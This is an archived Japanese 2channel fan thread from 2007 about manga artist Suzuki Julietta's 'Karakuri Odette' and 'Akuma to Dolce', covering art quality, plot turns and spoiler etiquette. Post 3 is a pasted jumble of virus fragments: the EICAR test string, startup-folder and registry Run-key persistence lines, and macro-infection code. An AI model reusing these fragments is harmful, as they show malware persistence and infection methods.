2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【オデット】鈴木ジュリエッタ 2【ドルチェ】

1 :花と名無しさん:2007/08/07(火) 23:09:53 ID:???0
花とゆめで活動中の鈴木ジュリエッタさんを語るスレです。
「カラクリオデット」や「悪魔とドルチェ」、その他の作品を語りましょう。


前スレ
【オデット】鈴木ジュリエッタ【ドルチェ】
http://anime2.2ch.net/test/read.cgi/gcomic/1145799723/

2 :花と名無しさん:2007/08/07(火) 23:12:26 ID:???0
作品一覧
・裏アンティーク
・朝が来る
・星になる日
・マイプレシャス
・拝み屋裏台帳
・マイブラッディライフ
・椿檻
・サクラチル
・片恋★悪魔ちゃん
・悪魔とドルチェ
・カラクリオデット

3 :花と名無しさん:2007/08/07(火) 23:27:11 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :花と名無しさん:2007/08/07(火) 23:57:37 ID:???O
>>1お疲れさま〜
どうもありがとう


5 :花と名無しさん:2007/08/08(水) 01:09:40 ID:???0
>>1
乙です〜ありがトン!

6 :花と名無しさん:2007/08/08(水) 02:36:14 ID:???0
>>1
乙&d

7 :花と名無しさん:2007/08/10(金) 12:35:38 ID:???0
>>1
&保守

8 :花と名無しさん:2007/08/11(土) 10:59:26 ID:???0
ジュリさんのカラーが好きだー
オデットとクリスの髪の色が綺麗

9 :花と名無しさん:2007/08/11(土) 22:13:15 ID:???O
>>8
まさにキキララカラーだよね。かわいい。
ジュリさんは扉カラーがわりと多い気がする

10 :花と名無しさん:2007/08/12(日) 18:37:10 ID:???0
即死怖い

クリスが月曜から学校行けるらしいから次回は学校ネタかな
それともトラヴィスとの休日が続くのかな

11 :花と名無しさん:2007/08/12(日) 22:34:45 ID:???0
オデット全部好きだけど、今回のは本当にイヤ。
ちゃんとオデットがクリスとトラヴィス、比べた事反省して欲しい。
クリスはあれでいいんだよ、まだ外の世界に出てない。
(テロ用に作られた子、ここまでよく成長したと思う。)
オデットは人間ぽくなってきたけど、そんなところは人間に似なくていいのに。

12 :花と名無しさん:2007/08/12(日) 23:04:38 ID:???O
次回がフォロー話なんじゃない?
自分は学校でバッテリー切れする回の印象が強いから、クリスがロボット的すぎると思った

13 :花と名無しさん:2007/08/13(月) 05:01:47 ID:Avxf3fvM0
ほっしゅ

14 :花と名無しさん:2007/08/13(月) 22:57:30 ID:???O
ジュリエッタ大好き

15 :花と名無しさん:2007/08/14(火) 20:40:12 ID:???0
久々に来てみたら新スレが。
>>1さん乙です。

>>12
次回でフォローあると信じたい。
そして学校シーン出てきて欲しい。
朝生不足でもう…

16 :花と名無しさん:2007/08/15(水) 18:42:55 ID:???0
次(10月発売)のザ花にドルチェ載らないんだね。寂しー
前回ので2巻収録分ピッタリだし、あれで一区切りなのかな

17 :花と名無しさん:2007/08/16(木) 03:47:56 ID:???0
>>16
まだ描く確率も高いけど、
本誌で連載を持ってるから、
ザではゆっくりしたペースじゃないかな。
月2本だけでもかなりきついしね。
(ジュリさんは休みが少ないほうだし)

18 :花と名無しさん:2007/08/16(木) 04:41:05 ID:???0
花ゆめって月2回で60pでしょ。
ほとんど週刊に近いページ数だよね。

19 :花と名無しさん:2007/08/17(金) 13:44:00 ID:???0
>>16
1巻に4話収録なら6月に出たザ花で8話だからピッタリだね。
ページ余ってたら昔の読み切りとか併録して欲しい。
ドルチェはまだ描きそうだけど>>17が言うように
オデットとかけもちだから
ザ花は1回おきくらいのペースになったのかな?と思った。

20 :花と名無しさん:2007/08/19(日) 17:25:06 ID:???0
>>11
自我が芽生えてきた子供だから仕方ないんじゃない?
オデットもクリスも小さい子供の喧嘩の延長戦だと思う
そこを成長させていくのが醍醐味だと思う…んだけど、
今号のは単に「朝生に言われたからそうした」感が強いのはどうかと思った
オデットの精神面成長話と、朝生とのプチ恋愛話は同時進行しないほうがいいんじゃないかな

21 :花と名無しさん:2007/08/19(日) 18:39:55 ID:???0
せめて発売日まではネタ伏せてくれ・・・

22 :花と名無しさん:2007/08/20(月) 07:52:50 ID:???O
読んだ。久々に朝生がでてきたから嬉しかった。
朝生いいよ。朝生。
最近絵柄が少しかわってきたね?
最後のクリスと博士のやりとり可愛いなぁ。



23 :花と名無しさん:2007/08/20(月) 18:24:26 ID:???0
絵柄が変わったっていうか
ジュリさんの絵ってキャラが童顔気味なイメージだから
オーウェン博士のキリッとしたデザインが目新しく感じたな

24 :花と名無しさん:2007/08/20(月) 19:18:08 ID:???0
オデットも朝生も、顔長くね?
ジュリさんは馬型進行形だったか。

25 :花と名無しさん:2007/08/20(月) 19:55:09 ID:???0
朝生ほんとうに久しぶりだね。
やっぱ朝生はいい。
オデットにクリスの事で怒ってるシーン見て
朝生はほんとうにいい奴だなーと改めて思った。

でもオデットがあそこで泣いたのは
クリスに申し訳なかったと思ったからとか
自分がクリスの気持ち考えて無かった事を
後悔したからとかじゃなくて
単に朝生にきつい事言われたからって感じで
なんだかなーと思った。

最後の涙はちゃんとクリスの事で泣いてるけど
朝生の時の方がインパクトあったから
最後の方は印象薄くなってるし…。
逆にした方が良かったんじゃ?と思った。

26 :花と名無しさん:2007/08/20(月) 21:04:14 ID:???0
まてまて、オデットはロボットなんだぞ。
まだそんなに感情キメ細かくないだろ。
まだ人間未満なんだから。

27 :花と名無しさん:2007/08/20(月) 22:37:53 ID:???0
今号は絵が雑だと思った

28 :花と名無しさん:2007/08/21(火) 01:37:02 ID:???0
顔というより、後頭部が長い気がした。

29 :花と名無しさん:2007/08/22(水) 00:38:01 ID:???O
水飲んでるコマかわいい
でもやっぱり全体的に絵は雑だと思った
残念。次回に期待
とりあえず朝生卒業確定おめでとう

30 :花と名無しさん:2007/08/22(水) 19:13:53 ID:???0
朝生が卒業すると学校での接点が無くなって悲しい…。
朝生が登場するとピシッと締まるから今後も今以上 登場して欲しいなぁ。

31 :花と名無しさん:2007/08/22(水) 20:35:12 ID:???O
卒業後まで続くのか、という疑問もあるね
進路気になるな
花梨入学してきても面白そうだけど朝生いないとなー…

32 :花と名無しさん:2007/08/22(水) 22:24:30 ID:???0
たわば先輩や鳥坂先輩のようにOBの方が在校生より
出席率が良かったりするかも。

33 :花と名無しさん:2007/08/23(木) 00:14:06 ID:???O
>>32
あーるか!?

34 :花と名無しさん:2007/08/23(木) 16:41:25 ID:???O
オデットがどの程度理解してるかわからなくて、
今回はクリスに感情移入してたなぁ
朝生も博士もいいね

新キャラも好きだけど前からいるキャラも動かしてほしいな

35 :花と名無しさん:2007/08/23(木) 20:50:35 ID:???0
今回の様子だとトラヴィスも学校にきそうだな
日に日に増えてくロボットに動揺する白雪が見たい

36 :花と名無しさん:2007/08/25(土) 08:34:38 ID:???0
最近作者ブログが頻繁に更新されてるね
猫かわいいよ猫

37 :花と名無しさん:2007/08/28(火) 00:41:56 ID:???0
>>27-28
自分も今回は絵が雑っていうかちょっとバランス崩れてるなと思った。
きっと時間無かったんだろうな。

悪魔ちゃんの時は絵が丁寧だし上手くなったと思ったんだけど
やっぱ時間に追われると崩れてしまうのか…。
いつもあのくらいを維持してくれれば最高。

38 :花と名無しさん:2007/08/31(金) 21:41:15 ID:???0
初版をよっぽど抑えられてたんだろうけど
ドルチェ2回目の緊急重版されてたね。もっと色んな人に読んでもらいてー

39 :花と名無しさん:2007/09/01(土) 02:49:12 ID:???O
ドルチェの読者層って女性ばかりなイメージだなあ
オデットは男性も好みそうな感じ

40 :花と名無しさん:2007/09/03(月) 05:23:43 ID:???0
ドルチェは男性に読ませても、
「おもしろい」って反応が返ってきたよ。
少なくとも私の周りは。

41 :花と名無しさん:2007/09/04(火) 13:40:42 ID:???0
ちなみにオデットは?

42 :花と名無しさん:2007/09/04(火) 16:45:45 ID:???0
当方、男ですが、オデットおもしろいと思いますよ。
ただ、話が進むにつれてちょっと息切れ感を感じます。

43 :花と名無しさん:2007/09/05(水) 18:08:43 ID:???0
4巻の表紙、白雪なんだね。てっきり順番で柚木村かと思った
七五三から登場してないし、5巻表紙はトラヴィスになりそうだ

44 :花と名無しさん:2007/09/06(木) 18:46:00 ID:???0
どのキャラも好きだけど、キャラ増やしすぎな気もする(・ω・`。)
朝生クリス柚木村は登場しないときの放置が長くて切ない

45 :花と名無しさん:2007/09/11(火) 19:18:25 ID:???0
>>43
柚木村好きだから柚木じゃなくて残念だけど
白雪との表紙可愛かったんで楽しみ。
オマケ4コマとかもあるといいな〜。

46 :花と名無しさん:2007/09/13(木) 18:53:50 ID:???0
>>44
同意
朝生は前回出てくれたけど
柚木村はもう何話出てないんだろう?
そろそろ出して欲しいな

47 :花と名無しさん:2007/09/14(金) 17:41:06 ID:???0
グレース切ないな…(´・ω・`)
オデットに「私と話をしてくれてありがとう」
って言う時のグレースの表情が好きだ。

48 :花と名無しさん:2007/09/15(土) 00:55:45 ID:???O
4巻発売いつ?
9月25日?

49 :花と名無しさん:2007/09/15(土) 01:12:15 ID:???0
花夢コミックって18か9に発売されるものじゃないの?

50 :花と名無しさん:2007/09/17(月) 16:10:44 ID:???0
公式サイトの新刊コミックスのページ
9月発売のコミックスの中で
オデットだけあらすじがアップされてない…orz
忘れられてんのかなー…

51 :花と名無しさん:2007/09/17(月) 17:23:21 ID:???O
絵がかわいくて一巻買ってみた。ネロの死を朝生に言わないオデットにジンときた。
口元に手をやってる絵もよかった。泣いてないけど泣きそうなほど嬉しいって感情がでてる気がして。
あと黒のもやもやトーンを多用してるから全体的に暗い雰囲気で個人的にそこがすごくいい。
でもあんま長く連載できるような話じゃないな。いつまでやるんだろ。

52 :花と名無しさん:2007/09/19(水) 20:25:47 ID:???0
ジュリさん今号の絵乱れ過ぎ…
しかも後半何とかペンだけ入れた状態。時間なかったんだな。
内容は朝生がいっぱいだった。

53 :花と名無しさん:2007/09/19(水) 21:31:00 ID:???0
それ、まだ今号じゃないしw

せめてネタバレは正式発売日正午からにしてくれ。

54 :花と名無しさん:2007/09/19(水) 21:38:54 ID:???0
ゴメン。コンビニに寄ったらあったから発売日かと思った。

55 :花と名無しさん:2007/09/19(水) 22:45:40 ID:???0
4巻描き下ろし少なかった
ジュリさんって柱とか書くの苦手なのかな
最後の2話が何度読んでもニヤケちゃう

56 :花と名無しさん:2007/09/20(木) 21:09:08 ID:???0
今号読んだ。絵ひどすぎだね。

57 :花と名無しさん:2007/09/21(金) 01:18:31 ID:???0
>ジュリさんって柱とか書くの苦手なのかな

なんとなくそんな感じするね。
でも余計な事まで色々語っちゃってる痛い柱よりかは
ジュリさんの淡々とした柱は毒がなくていい。
でも、もっと色々製作の裏話とかしてもらえると嬉しいなあ。

58 :花と名無しさん:2007/09/21(金) 01:30:21 ID:???0
裏話は巻末ページで結構満足してる。

ドルチェ買ってきた。
オデットの方が色んな要素があって面白いなぁと思ったけど、
まだ1巻だしこれからどんどん発展していくのかな。

59 :花と名無しさん:2007/09/22(土) 12:53:49 ID:???0
今月は面白かった、先月の展開に怒り心頭だったので癒された。
朝生の友達岩崎はいい奴だ、朝生の繊細な心にワロタ。

あのバカ博士、早く消えて欲しい。
あいつはトラヴィスよりも性能いい子ができたら、トラヴィスも捨てちゃう奴。
その辺トラヴィスどう思っているんだろう?
金も異常に持っているから、あくどい事いっぱいしてるんだろうな。

60 :花と名無しさん:2007/09/23(日) 02:40:21 ID:???0
今号の絵は
単行本作業と新展開を目指してるのに
思ったようにいかなくて焦ってるせいかな

・・・と妄想

61 :花と名無しさん:2007/09/23(日) 14:46:54 ID:???0
トラヴィスがビュートに見える…orz

62 :花と名無しさん:2007/09/23(日) 15:02:22 ID:???0
自分はここや花ゆめスレで指摘さてるような
乱れも白さも感じなかった、というかいつも通りに見えたよ
けどアシ募集してたから、今回は人手が足りなかったのかもね


63 :花と名無しさん:2007/09/23(日) 18:00:43 ID:???0
あの扉絵を見て、乱れを感じなかったのか?

64 :花と名無しさん:2007/09/23(日) 22:37:38 ID:???0
オデット4巻でちょっとした矛盾が気になった
・20話で洋子は初孫だって言ってるのに、23話で兄が登場
・3巻でオデットが水に濡れた時は、漏電してる絵があったのに、
4巻で柚木村に助けられた時には、漏電しなくてばれない

つじつま合わせつつ世界観を広げるっていうのは、難しいんだろうなぁ
本当にちょっとした事だけど、だんだんジュリさんの丁寧さがなくなっていくようで不安になった

65 :花と名無しさん:2007/09/23(日) 22:46:54 ID:???0
>>63
扉絵のは乱れとは言わなくない?

66 :花と名無しさん:2007/09/24(月) 07:40:16 ID:???0
>>64
・洋子は「女の子の」初孫
・漏電しないくらいには防水
でいかがでしょうか?

67 :花と名無しさん:2007/09/24(月) 07:45:21 ID:???0
たったいま4巻5番目の柱をみてコーヒー吹いた
今日もう一冊買ってくる。。。

68 :花と名無しさん:2007/09/24(月) 20:45:50 ID:???0
>>67
乙w

69 :(;´Д`)ハアハア:2007/09/26(水) 07:55:53 ID:LNDOunWkO
(;´Д`)ハアハア 過疎りすぎだ・・・・・・・・・?!



70 :花と名無しさん:2007/09/26(水) 21:16:19 ID:???0
サイト閉鎖だって…更新はゆっくりだったけど楽しみにしてたから残念。

71 :花と名無しさん:2007/09/26(水) 22:22:11 ID:???0
ブログはどうするんだろ
やっぱり停止かねえ

72 :花と名無しさん:2007/09/26(水) 23:00:48 ID:???O
今号絵の下手さが目立った。この絵が好きだと思ったのに残念。てきとー臭さがでてる。

73 :花と名無しさん:2007/09/27(木) 22:38:41 ID:???0
>>72
必死なんじゃない?
ザ花とかもあるだろうし。他の漫画家はザ花でのシリーズなんてやってないでしょ。

74 :花と名無しさん:2007/09/27(木) 23:00:07 ID:???O
>>73
忙しくて手間かけられないのか。残念だ。コミクスで修正あればいいけど。

75 :花と名無しさん:2007/09/27(木) 23:56:01 ID:???O
>>73
別花に次のザ花予告載ってたけどジュリさん載らないよ

ていうかそれ以前に、
忙しくて連載が荒れてることを読者に悟られるのはどうかと思う
ジュリさん好きだけどさ
前みたいな熱意を感じない、個人的に

76 :花と名無しさん:2007/09/28(金) 18:09:22 ID:???0
確かに今回ちょっと絵が荒れてるね。
そこまで酷いとは思わなかったけど、
丁寧な時はもっと上手いから
比べるとやっぱ差があると思う。
締め切りに間に合わなくて
急いで描いたって感じの雑さだね。
忙しくて大変なんだろうけど
それは他の作家も同じだしなあ。

がんばれジュリさん!

77 :花と名無しさん:2007/09/29(土) 18:28:44 ID:???0
本屋に貼ってあった白泉のコミックス発売ガイドみたら
ドルチェが11/19発売て書いてあった!

78 :花と名無しさん:2007/10/02(火) 13:57:49 ID:???0
ドルチェ2巻11月発売なんだ。
思ってたより早くて嬉しい。
ドルチェは雑誌で見てない分さらに楽しみ。

79 :花と名無しさん:2007/10/03(水) 23:11:36 ID:TIw7RjltO
オデット終わるんだね

80 :花と名無しさん:2007/10/04(木) 03:16:49 ID:???0
終わるのか?

81 :花と名無しさん:2007/10/04(木) 04:26:49 ID:???0
本誌スレによると次号からクライマックス突入らしい。
あと5、6回くらいで最終回ってことでしょう。

82 :花と名無しさん:2007/10/04(木) 10:39:06 ID:???O
いや、コミックス収録を考えるとラス4じゃない?
やっぱ悪魔ちゃんが連載終了フラグだったのかな

83 :花と名無しさん:2007/10/04(木) 15:09:21 ID:???0
トラヴィス登場については批判もあるけど、
オデットに好意を持ったり、朝生に好意を持ったりする新キャラ
(柚木村やミカちゃんやトラヴィスなど)の登場の仕方で、オデットの成長だけではなくて、
特定の人間(朝生)に惹かれていく様子が読者によく伝わってると思うよ。

だからこそ、「人間と一緒にいると、時々ロボットであることを忘れてしまう」
辛さも知ってしまったオデットが、人間(朝生)とロボット(トラヴィス)、
どちらと一緒に生きていくかを選ぶのが見物だな。

84 :花と名無しさん:2007/10/05(金) 23:09:33 ID:???0
…クリスはどこへ?

85 :花と名無しさん:2007/10/06(土) 15:00:30 ID:???0
オデットついにクライマックス突入か…
いつ終わってもおかしくないと覚悟はしてたけど
実際もうすぐ終わるんだって思うと寂しいな…。

やっぱトラヴィス達出てきた辺りの展開が
タゲにはウケなかったんだろうか。
それとも元々このくらいで終わる予定だったのかな。

何にせよオデットがどんな結末になるのか楽しみ。
そして早くも新連載に期待してる。
…けど、次本誌でいきなり連載は無理かな?

86 :花と名無しさん:2007/10/07(日) 02:10:24 ID:???0
ジュリさんはデビュー作からずっと好きで応援してるけど、
正直オデットは1巻のころが一話一話のクオリティが高くて好きかも。
連載が続くようになって、ストーリーの完成度が落ちた気がする。
キャラの量産→放置をよく指摘されてるけど、
多分ジュリさんは、「今描きたいもの」に正直なんじゃないかなあ。
もう興味を失ったテーマを引っ張るのが苦手なのかな、と思ったりする。
花ゆめってぐだぐだループ連載が多いけど、ジュリさんは短距離走者タイプというか、
一話にエピソードとかメッセージを簡潔につめるのがうまいので、
一話一話で見るとどのエピソードも好きで、ムダな回は無いんだけど、
通して読むと散漫な気もする…。
絵柄も好きだから丁寧に描いてほしいし、花ゆめの連載ペースが難しいなら
ザ花でも別花でもメロディでもついていくんで、
がんばってほしいなあ。
ドルチェとか、将来自分に女の子が生まれたら読ませたいなあ、と思ってるし。



87 :花と名無しさん:2007/10/08(月) 01:17:15 ID:???0
柚木村は最後出てくるかな?割と好きだったのに出番少なすぎ。

88 :花と名無しさん:2007/10/08(月) 03:35:43 ID:???0
柚木村VS白雪とか見たかったのう…

89 :花と名無しさん:2007/10/08(月) 11:59:34 ID:???0
朝生より柚木村が好きだったから
出番ないのは悲しい
最後にちゃんと出番作って
柚木村のエピを完結させて欲しいな

90 :花と名無しさん:2007/10/09(火) 23:39:02 ID:???0
なんだかとっても打ち切り臭がするので
柚木村、このままスルーされそうで怖い。
最後に出たのが六号で秋、今は卒業シーズン、
指輪はどうなったんだよー

91 :花と名無しさん:2007/10/10(水) 00:28:17 ID:???O
ほんと一話一話の話はとってもいいんだけど連載としてまとまったスムーズな話の展開はうまくないよね。
前ぶれなくぼんぼん新たな話がくるからだね。

92 :花と名無しさん:2007/10/10(水) 14:10:11 ID:???0
途中から新キャラ出し過ぎだね。
もうちょっと最初の方の固定キャラで話をすすめて欲しかった。

93 :花と名無しさん:2007/10/13(土) 13:09:07 ID:???O
ジュリさんサイト閉鎖するんだね。
しばらく休養するのかな?
今のキャラ大放出展開って担当の指示じゃなかったっけ??


94 :花と名無しさん:2007/10/13(土) 19:19:09 ID:???O
「新しい担当さんと冒険する」
って書いてただけで担当にキャラ大放出を指示されたなんてどこにも書いてないよ
それ以前から展開のわりにキャラ出しすぎな感があったし

95 :ホッカル ◆NPFA19Bf7o :2007/10/14(日) 19:19:44 ID:WHuqkPRX0
カルピスからの一言
    ∧_∧     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (; ´Д`)  <   ・・・・・・えぇ・・・・・?!打ち切りだけは勘弁してくれよ
   _, i -イ、    |
 (⌒`    ⌒ヽ   \________________  
  ヽ  ~~⌒γ⌒)  
   ヽー―'^ー-' 
    〉    |
   /     |
  {      }
  |      |
  {  ,イ ノ


96 :花と名無しさん:2007/10/14(日) 21:45:54 ID:???O
>>87
柚木村いい奴だったのになぁ…
もっかいちゃんとした出番をあげてほしい

97 :花と名無しさん:2007/10/15(月) 20:34:08 ID:???0
クライマックスと書いてあるだけで
今すぐ終わると書いてあるわけじゃないぜ!
もう3冊くらいは・・・

98 :花と名無しさん:2007/10/16(火) 02:00:17 ID:???0
4巻買った。
新キャラのせいで洋子の影が薄くなったような気がしたのが残念だけど、全体的に楽しめた。
登山の話がいいね。
あと、やっぱこの作者はギャグのセンスが良い。

次の巻あたりからつまらなくなるの?

99 :花と名無しさん:2007/10/16(火) 21:05:27 ID:???0
>>98
3巻が柚木村・4巻が白雪メインになったように
5巻も新キャラの割合が多いだけだよ
好きキャラが登場しないことを嘆いてる読者が多い

100 :花と名無しさん:2007/10/19(金) 14:14:34 ID:???0
>>83の書き込みが22号の内容そのままなんだけど、
それ伏線あったっけ?
「どちらと一緒に生きていくか選ぶ」とかそういう言い回しあったっけ?
なぜ知ってたんだ?

101 :花と名無しさん:2007/10/19(金) 16:30:32 ID:???0
83だが……
@トラヴィスが、結婚相手にオデットを望んでいる
Aオデットは朝生に惹かれている
B朝生は(恋愛感情かは微妙だが)オデットのことを鬱陶しくも大切に思っている
Cオデットは、「人間と一緒にいると、時々ロボットであることを忘れてしまう」 辛さも知ってしまった
Dクライマックス突入
という要素から勝手に予想した。
本当にそんな展開になったのね……。

102 :花と名無しさん:2007/10/19(金) 19:41:07 ID:???0
>>100
ちょ…22号まんまて…
さりげなくネタバレしないでくれ…orz

まあその展開にはなるだろうと思ってはいたけどさ。

103 :花と名無しさん:2007/10/19(金) 20:21:02 ID:???0
>>100
>>52と同じ人?そうじゃなくてもたった50レス前で注意されているのに最悪すぎる・・・。
あのね、関西とか普通に発売日前日に売っているとこもあるが
発売日当日にしか発売しないところも多いんだから本気で配慮してくれ。
ネタバレは発売時当日、それもせめて正午以降。基本だろ?


104 :花と名無しさん:2007/10/19(金) 20:22:15 ID:???0
ここって毎回のように発売前にさり気ないネタバレがくるね
最近はネタバレのたびに発売日まで待ってってレス入ってるんだから
テンプレになくても空気読んでよ

105 :花と名無しさん:2007/10/20(土) 01:13:52 ID:???0
悪気は無かったみたいだし次空気読んでくれればいいや。

そして次テンプレに
「ネタバレは発売日の正午以降」
入れた方がいいかもね。
本気で読め無い人はテンプレも読まないだろうけど
ここは割りと精神年齢層高めっぽいし大丈夫だろう。

106 :花と名無しさん:2007/10/20(土) 19:26:32 ID:???0
朝生がピュアすぎて笑った

107 :花と名無しさん:2007/10/21(日) 01:19:17 ID:???0
「魔改造」って、裸にでもするのかい…

108 :花と名無しさん:2007/10/21(日) 17:26:46 ID:???0
久々に見たらカラーがきれいでびっくりした
上手くなった?

109 :花と名無しさん:2007/10/21(日) 21:52:47 ID:???0
CGマジックがちょっと入ってるなとはよかったけど、
女ロボットの処理が効果的で上手いと思った

110 :花と名無しさん:2007/10/22(月) 18:39:15 ID:???0
ついに公式サイトが閉鎖された。

仕事が最優先だろうけど、余力が出てきたら再開して欲しいなぁ。

111 :花と名無しさん:2007/10/23(火) 21:55:50 ID:???O
オデットかわいい。
ロボットだからか、よくあるベタなヒロインの反応ってものをあんまりしなくて新鮮。
キャーキャーイヤアアーイヤー言わないし、泣き崩れないし。

112 :花と名無しさん:2007/10/27(土) 16:44:03 ID:???0
キャーキャーイヤアアーイヤー言うマユリも好きだ
ジュリさんがそういうキャラを描いても
イヤミがないというか何というか

113 :花と名無しさん:2007/10/29(月) 18:15:46 ID:???0
>キャーキャーイヤアアーイヤー

ワロタww

オデットはロボットなだけに淡白というか
普通とちょっとズレててそういう所が面白くて好きだった。

でも今号のオデットはなんかちょっと今までとキャラ変わってて微妙。
人間らしくなってきてるからああなったんだろうけど
なんか違和感あるんだよなあ…。

114 :花と名無しさん:2007/11/02(金) 18:31:39 ID:???0
>>106
同じくピュアな朝生にワロタw
朝生のこういうとこ好きだ
オデット終わったら寂しくなるなぁ

115 :花と名無しさん:2007/11/06(火) 08:47:03 ID:???O
今号おもしろかったけど、内容があったようなないような。
前回までの話からもっと人間とロボットの深い話になるのかと思ってたけど、ぶっ壊されてあっさり終わった。
てか目を撃たれてホラー…((゚д゚;))トラヴィスは腕ぐちゃぐちゃ…威力ちげぇ。
博士…愛情がもてないと自覚があるのに可哀想だと思わないんだな。

116 :花と名無しさん:2007/11/06(火) 17:07:19 ID:???0
自分は今回みたいな緊迫した展開も好きだけど
少女マンガとしては怖すぎだったかな?とも思った。
タゲとかこういう展開は好まないだろうな。

あと2回〜4回で終了なワケだけど
どうやって終わるのかな。

117 :花と名無しさん:2007/11/07(水) 16:31:26 ID:???0
自分も好きだけど雑誌カラーには合わないな、と思った
猫の話のときもそうだったけど、主人公はスッキリしてるけど
読者は完全にはスッキリできない終わり方っていうか・・・


けど朝生の言葉を真に受けてヘコむオデットは可愛かった

118 :花と名無しさん:2007/11/07(水) 21:16:19 ID:???0
最近絵が縦長になってきた気がする。

119 :(;´Д`)ハアハア:2007/11/08(木) 00:00:07 ID:txQCDvl/O
(;´Д`)ハアハア 朝生ほど 好感のもてる男性キャラは

少女漫画にはないな


120 :花と名無しさん:2007/11/08(木) 15:49:19 ID:???0
今回の展開結構好きな自分は少数派かな…。
確かに雑誌のカラーにはちょっと合わないんだけど
花ゆめでは色んなタイプの話読みたいし
ジュリさんにはこれからも毛色の違った漫画を描き続けて欲しいな。

今回は朝生のセリフ(言葉より行動だろ)が良かった。
助けに来たのに「たまたまだ」とか言うのも朝生らしくていい。
やっぱ朝生好きだなあ。

121 :花と名無しさん:2007/11/08(木) 16:24:45 ID:???0
言葉より行動…つまりツンデr
たまたま近くを通っただけなんだからね!?勘違いしないでよ!?

122 :花と名無しさん:2007/11/08(木) 18:50:46 ID:???0
>>120
展開は自分も嫌いじゃないけど、
正直言ってカラクリオデットという漫画にそぐわなくないか?>今の展開
初期からこういう殺伐としたシリアス漫画だったら違和感もなかったけどさ。
もっとほのぼのと人間とロボットの違いを描いたほうがこの作品らしかったと思う。
トラヴィス達が出てきてから世界観が変わっちゃった気がするもんなぁ。
だから批判が出てきたんじゃないかな。

123 :花と名無しさん:2007/11/08(木) 21:02:54 ID:TB7j/q21O
ただ話を畳もうとしただけかと思う。
世界感が変わったとか、展開がシリアスとかいうような問題じゃなく。

124 :花と名無しさん:2007/11/08(木) 22:02:30 ID:???0
話を畳もうとすると
絵も話もやっつけになるってこと?

125 :花と名無しさん:2007/11/08(木) 22:33:33 ID:???0
>>124
急展開ではあるけど話は別にやっつけ仕事には見えないな。
ただ絵は荒れてるね。
ネームに時間かかっちゃって作画にかける時間が減っちゃったのかな。


126 :花と名無しさん:2007/11/08(木) 23:00:01 ID:???O
絵は最近酷いが話はそんなに悪くないんだよ
ただオデットらしくないだけで


オデットや朝生、トラヴィスらの行く末に加えて
洋子、ユキムラ、ミカ、白雪も最終回までにフォローしきれるのだろうか
なんとなく作品からジュリさんの愛情を感じないんだよなここんとこ

127 :花と名無しさん:2007/11/08(木) 23:05:52 ID:???0
>>122
そう言われてみると確かにちょっと
世界観というか雰囲気は変わったよね。
トラヴィス出す前にもっと柚木村とか白雪が絡んだ話見たかったな。

128 :花と名無しさん:2007/11/09(金) 23:40:49 ID:???O
確かブログでちょっと冒険します的な事を言ってなかった?
その結果が今のこれかと

129 :花と名無しさん:2007/11/10(土) 00:18:43 ID:???0
付録についてた花ゆめカレンダー使ってるけど11月になったのでめくったらオデットだった
そんだけだけど

130 :花と名無しさん:2007/11/10(土) 01:29:55 ID:ZYjdoZ6fO
四巻発売日に買って今日まで放置してた
白雪かわいいよ白雪


131 :花と名無しさん:2007/11/10(土) 13:27:41 ID:???0
>>128
確かに冒険だったねぇ…。
でも今の花ゆめであの展開にチャレンジした勇気は買いたい。

132 :花と名無しさん:2007/11/10(土) 17:02:07 ID:???0
ドルチェ2巻が楽しみで仕方ない。
オデット終わったらドルチェの続き描いてくれるかな。

133 :花と名無しさん:2007/11/11(日) 17:26:20 ID:???0
同じく楽しみ
あと1週間だー!

134 :花と名無しさん:2007/11/17(土) 22:28:23 ID:???0
オデット1号で最終回だって。
終わっちゃうのさみしいなあ…(´;ω;`)

135 :花と名無しさん:2007/11/18(日) 00:21:27 ID:???0
オデット大好きなのに。
初期のころのオデットでいって欲しかったな。
トラヴィスも好きだけど、オデットでは出さない方がよかった。
迷走してしまったのが残念。

ドルチェ2巻もうじき発売楽しみ。


136 :花と名無しさん:2007/11/19(月) 18:31:54 ID:???0
ドルチェ買ったお

137 :花と名無しさん:2007/11/19(月) 22:42:13 ID:???O
同じく。
も少し引っ張るかと思いきや案外あっさり両思いだな

138 :花と名無しさん:2007/11/19(月) 22:48:12 ID:???0
てっきりまゆりは半魔なのかとおもってた。
そういう理由があったとは。

きちんとママとも思いあっているみたいだしいいなあ、この二人。

139 :花と名無しさん:2007/11/20(火) 04:02:26 ID:???O
ドルチェ2巻よかった。
次出るのは何年後だ…orz
ストックないよね?


しかしマユリの性格はたまにウザイ。

140 :花と名無しさん:2007/11/20(火) 10:00:11 ID:???0
マコちゃんがいいキャラだ。

141 :花と名無しさん:2007/11/20(火) 17:09:38 ID:???0
>>139
マユリのウザさとビュートの自己チューでバランス取れてるよ
結局ラブラブでいい感じになるから、毎話毎話ニンマリ(*´Д`)

142 :花と名無しさん:2007/11/20(火) 20:50:31 ID:???0
二巻で終わりじゃないよね?
人間の方が時間過ぎるの早いとかその辺り気になるんだが
書いてくれるかなぁ

143 :花と名無しさん:2007/11/21(水) 14:06:10 ID:???0
ってりうか、あっさり両思いになりすぎ。
2巻で唐突にバレンタインかと思ったら…

144 :花と名無しさん:2007/11/21(水) 17:06:25 ID:???0
